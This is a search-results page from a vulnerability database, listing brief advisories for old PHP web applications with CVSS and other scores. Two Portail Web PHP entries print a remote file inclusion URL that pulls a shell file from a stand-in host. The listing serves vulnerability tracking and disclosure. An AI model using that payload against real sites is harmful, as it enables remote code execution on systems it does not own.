Lucene search
K

164 matches found

Exploit DB
Exploit DB
added 2007/02/01 12:0 a.m.33 views

Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion

php web portail remote file include download site: https://sourceforge.net/project/showfiles.php?groupid=178400 product:php web portail bug: remote file include risk : high remote file include : /includes/includes.php?sitepath=http://site.com/shell.txt?%00 laurent gaffié http://s-a-p.ca/ contact:...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2007/02/01 12:0 a.m.11 views

Portail Web PHP 2.5.1 - includes.php Remote File Inclusion

Portail Web PHP 2.5.1 - includes.php Remote File Inclusion php web portail remote file include download site: https://sourceforge.net/project/showfiles.php?groupid=178400 product:php web portail bug: remote file include risk : high remote file include :...

0.2AI score
Exploits0
seebug.org
seebug.org
added 2006/12/26 12:0 a.m.54 views

Slooze PHP Web Photo Album验证绕过漏洞

Slooze PHP Web Photo Album是一款基于PHP的WEB应用程序。 Slooze PHP Web Photo Album不正确过滤用户提交的输入,远程攻击者可以利用漏洞未授权访问应用程序。 问题是由于脚本的验证机制缺少正确处理,攻击者可以提交恶意参数绕过验证,以管理员权限访问应用程序。 Slooze PHP Web Photo Album 0.2.7 目前没有解决方案提供: http://www.slooze.com/...

7.1AI score
Exploits0
NVD
NVD
added 2006/10/24 8:7 p.m.14 views

CVE-2006-5481

Multiple PHP remote file inclusion vulnerabilities in 2le.net Castor PHP Web Builder 1.1.1 allow remote attackers to execute arbitrary PHP code via the rootpath parameter in 1 lib/code.php, 2 lib/dbconnect.php, 3 lib/error.php, 4 lib/menu.php, and other unspecified files. NOTE: the provenance of...

7.5CVSS7.5AI score0.01232EPSS
Exploits0References2
NVD
NVD
added 2005/12/05 11:3 a.m.13 views

CVE-2005-4013

PHP Web Statistik 1.4 stores the stat.cfg file under the web root with insufficient access control, which allows remote attackers to obtain sensitive information such as statistics and the log directory location, possibly including the logdb.dta file...

5CVSS6.4AI score0.01615EPSS
Exploits0References8
NVD
NVD
added 2005/12/05 11:3 a.m.17 views

CVE-2005-4012

Multiple cross-site scripting XSS vulnerabilities in PHP Web Statistik 1.4 allows remote attackers to inject arbitrary web script or HTML via 1 the lastnumber parameter to stat.php and 2 the HTTP referer to pixel.php...

4.3CVSS5.9AI score0.01851EPSS
Exploits1References10
NVD
NVD
added 2005/12/05 11:3 a.m.14 views

CVE-2005-4014

stat.php in PHP Web Statistik 1.4 allows remote attackers to cause a denial of service CPU consumption via a large lastnumber value...

7.8CVSS6.7AI score0.02097EPSS
Exploits0References7
NVD
NVD
added 2005/12/05 11:3 a.m.12 views

CVE-2005-4015

PHP Web Statistik 1.4 does not rotate the log database or limit the size of the referer field, which allows remote attackers to fill the log files via a large number of requests, as demonstrated using pixel.php...

5CVSS6.8AI score0.01387EPSS
Exploits0References5
CVE
CVE
added 2005/12/05 11:0 a.m.45 views

CVE-2005-4012

The CVE-2005-4012 entry describes multiple cross-site scripting (XSS) vulnerabilities in PHP Web Statistik 1.4 . An attacker can inject arbitrary script via (1) the lastnumber parameter to stat.php and (2) the HTTP Referer to pixel.php. The NVD entry lists a Medium base score (4.3) with no authen...

4.3CVSS6.1AI score0.01851EPSS
Exploits1References10Affected Software1
CVE
CVE
added 2005/12/05 11:0 a.m.42 views

CVE-2005-4013

PHP Web Statistik 1.4 stores the stat.cfg file under the web root with insufficient access control, allowing remote attackers to read sensitive information such as statistics and the log directory location, and possibly the logdb.dta file. Root cause: weak access permissions on stat.cfg exposed v...

5CVSS6.8AI score0.01615EPSS
Exploits0References8Affected Software1
Cvelist
Cvelist
added 2005/12/05 11:0 a.m.21 views

CVE-2005-4012

Multiple cross-site scripting XSS vulnerabilities in PHP Web Statistik 1.4 allows remote attackers to inject arbitrary web script or HTML via 1 the lastnumber parameter to stat.php and 2 the HTTP referer to pixel.php...

5.9AI score0.01851EPSS
Exploits1References10
securityvulns
securityvulns
added 2005/11/28 12:0 a.m.35 views

[Full-disclosure] Php Web Statistik Multiple Vulnerabilities

PHP Web Statistik Multiple Vulnerabilities Name Multiple Vulnerabilities in PHP Web Statistik Systems Affected PHP Web Statistik verified on 1.4 Severity Medium Risk Vendor www.php-web-statistik.de Advisory http://www.ush.it/2005/11/19/php-web-statistik/ Author Francesco ‘aScii’ Ongaro ascii at...

0.2AI score
Exploits0
exploitpack
exploitpack
added 2005/11/28 12:0 a.m.23 views

PHP Web Statistik 1.4 - Content Injection

PHP Web Statistik 1.4 - Content Injection source: https://www.securityfocus.com/bid/15603/info PHP Web Statistik is prone to multiple content injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. The vulnerabilities could allow f...

7.7AI score
Exploits0
Exploit DB
Exploit DB
added 2005/11/28 12:0 a.m.25 views

PHP Web Statistik 1.4 - Content Injection

source: https://www.securityfocus.com/bid/15603/info PHP Web Statistik is prone to multiple content injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. The vulnerabilities could allow for HTML injection and cross-site scripting...

7.4AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2005/09/19 12:0 a.m.20 views

Calendar Express Multiple Vulnerabilities (SQLi, XSS)

The remote host is using Calendar Express, a PHP web calendar. Vulnerabilities exist in this version that could allow an attacker to execute arbitrary HTML and script code in the context of the user's browser, and SQL injection. An attacker could exploit these flaws to use the remote host to...

7.5CVSS6.5AI score0.00931EPSS
Exploits1References1
securityvulns
securityvulns
added 2005/01/06 12:0 a.m.22 views

QWikiwiki directory traversal vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Title: QWikiwiki directory traversal vulnerability Vulnerability discovery: Madelman madelman AT iname.com Date: 01/01/2005 Severity: Critical Summary: - -------- QwikiWiki is driven by one core design goal: simplicity. This design goal is codified in...

6.8AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/05 12:0 a.m.26 views

PSNews 1.1 - 'No' Cross-Site Scripting

source: https://www.securityfocus.com/bid/11124/info PSNews is a Web application that is implemented in PHP. PSNews is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. This vulnerability is reported t...

7AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2004/08/18 12:0 a.m.67 views

MercuryBoard < 1.1.6 SQL Injection

Binary data 4510.prm...

7.5CVSS7.3AI score0.00967EPSS
Exploits1References2
Tenable Nessus
Tenable Nessus
added 2004/07/25 12:0 a.m.43 views

SUSE-SA:2002:036: mod_php4

The remote host is missing the patch for the advisory SUSE-SA:2002:036 modphp4. PHP is a well known and widely used web programming language. If a PHP script runs in 'safe mode' several restrictions are applied to it including limits on execution of external programs. An attacker can pass shell...

7.5CVSS6.2AI score0.02951EPSS
Exploits0References1
Tenable Nessus
Tenable Nessus
added 2004/07/25 12:0 a.m.20 views

SUSE-SA:2003:0008: imp

The remote host is missing the patch for the advisory SUSE-SA:2003:0008 imp. IMP is a well known PHP-based web-mail system. Some SQL-injection vulnerabilities were found in IMP 2.x that allow an attacker to access the underlying database. No authentication is needed to exploit this bug. An attack...

7.5CVSS5.7AI score0.24055EPSS
Exploits0References1
Rows per page
Query Builder